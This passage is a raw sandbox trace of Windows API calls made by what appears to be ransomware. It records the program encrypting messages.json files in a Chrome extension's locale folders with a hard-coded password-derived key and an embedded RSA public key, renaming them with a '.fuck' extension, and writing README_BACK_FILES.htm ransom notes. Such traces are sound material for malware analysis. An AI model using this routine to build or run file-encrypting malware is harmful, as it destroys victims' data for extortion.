szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.048] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.048] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.048] CryptHashData (hHash=0x2e18128, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.048] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.048] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.048] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.048] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14ec8) returned 1 [0257.049] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14ec8, dwCertEncodingType=0x1, pInfo=0x2e2a990*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a9c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a9c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19968) returned 1 [0257.049] CryptEncrypt (in: hKey=0x2e19968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.049] CryptEncrypt (in: hKey=0x2e19968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14f50*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14f50*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.049] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e14f50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14f50*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.050] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xff, lpOverlapped=0x0) returned 1 [0257.052] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xff, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0257.052] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0257.052] CloseHandle (hObject=0x5d60) returned 1 [0257.052] CloseHandle (hObject=0x5d5c) returned 1 [0257.052] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json"), bFailIfExists=0) returned 1 [0257.055] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json", dwFileAttributes=0x0) returned 1 [0257.055] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.gsg")) returned 1 [0257.056] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\messages.json.fuck")) returned 1 [0257.057] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.057] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.057] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.057] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.057] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.057] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\readme_back_files.htm")) returned 0xffffffff [0257.057] AreFileApisANSI () returned 1 [0257.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.057] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.058] GetFileType (hFile=0x5d50) returned 0x1 [0257.058] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.059] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.059] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.060] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.060] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.060] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.060] GetLastError () returned 0x0 [0257.060] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json")) returned 0x20 [0257.060] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0257.061] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.061] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.062] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.062] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.064] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.064] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.064] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.064] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.064] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.064] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.064] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e151f8) returned 1 [0257.065] CryptImportPublicKeyInfo (in: hCryptProv=0x2e151f8, dwCertEncodingType=0x1, pInfo=0x2e2b760*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b790*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b798*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19fe8) returned 1 [0257.065] CryptEncrypt (in: hKey=0x2e19fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.065] CryptEncrypt (in: hKey=0x2e19fe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15308*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15308*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.065] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e15308*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15308*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.066] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb7, lpOverlapped=0x0) returned 1 [0257.067] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.067] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.067] CloseHandle (hObject=0x5d5c) returned 1 [0257.067] CloseHandle (hObject=0x5d60) returned 1 [0257.067] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0257.069] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0257.070] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.gsg")) returned 1 [0257.071] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\messages.json.fuck")) returned 1 [0257.071] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.071] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.071] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.072] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.072] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.072] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0257.072] AreFileApisANSI () returned 1 [0257.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.072] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.072] GetFileType (hFile=0x5d50) returned 0x1 [0257.073] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.073] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.073] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.074] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.074] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.074] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.074] GetLastError () returned 0x0 [0257.074] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json")) returned 0x20 [0257.074] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json", dwFileAttributes=0x80) returned 1 [0257.074] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.075] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.077] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.077] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.079] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.079] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.079] CryptHashData (hHash=0x2e18128, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.079] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.079] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.079] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.079] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15390) returned 1 [0257.079] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15390, dwCertEncodingType=0x1, pInfo=0x2e2bc40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2bc70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2bc78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19ca8) returned 1 [0257.079] CryptEncrypt (in: hKey=0x2e19ca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.079] CryptEncrypt (in: hKey=0x2e19ca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e148f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e148f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.079] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e148f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e148f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.080] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc7, lpOverlapped=0x0) returned 1 [0257.081] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.081] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, 